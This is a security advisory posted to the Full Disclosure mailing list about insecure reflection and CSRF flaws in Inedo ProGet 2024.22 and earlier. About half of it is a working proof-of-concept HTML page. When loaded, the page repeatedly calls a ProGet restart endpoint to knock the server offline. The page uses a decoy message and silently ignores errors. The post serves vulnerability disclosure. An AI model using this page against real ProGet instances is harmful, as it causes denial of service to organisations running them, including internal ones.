[FD] Inedo ProGet Insecure Reflection and CSRF Vulnerabilities

Sat, 26 Apr 2025 21:53:08 -0700 

Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of 
service and information disclosure attacks (among other things) because the 
information system directly exposes the C# reflection used during the 
request-action mapping process and fails to properly protect certain pathways.  
These are amplified by cross-site request forgery vulnerabilities (CSRF) due to 
the application's failure to verify the HTTP request method and apply CSRF 
protections accordingly.  Specifically, unauthenticated attackers can chain 
CSRF and reflection attacks to cancel executions, restart the ProGet instance, 
and perform certain other actions.  The following is a sample script that can 
be used to demonstrate the vulnerability, restarting the victim Inedo ProGet 
instance ad infinitum.  Notably, this attack will work regardless of browser 
pre-flight protections, etc., since ProGet ignores the HTTP request method.  It 
is likely that more recent versions are also vulnerable to this, but the CS
 RF portion allows attacking internal (private) instances in addition to 
directly accessible (e.g., public) instances.  This is vulnerability is known 
to exist across multiple major versions.

<!DOCTYPE html>
<html lang="en">
<head>
<script>
function sleep(ms) {
                return new Promise(resolve => setTimeout(resolve, ms));
}
function sendData() {
                var xhr = new XMLHttpRequest();
                xhr.open('HEAD', 
'http://vict.im/0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb');
                xhr.send();
}
async function executeDosAttack() {
                while(true) {
                                try {
                                                sendData();
                                                sendData();
                                                // Sleep for 500 ms
                                                await sleep(500);
                                } catch(ignoreMe) {
                                                // Gobble up exceptions since 
we expect the service to go down and pre-flight triggers the shutdown anyway
                                }
                }
}
</script>
</head>
<body onload="executeDosAttack()">
<h1>Insecure Reflection + CSRF + DOS Attack</h1>
<p>It's silently working in the background...</p>
</body>
</html>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Reply via email to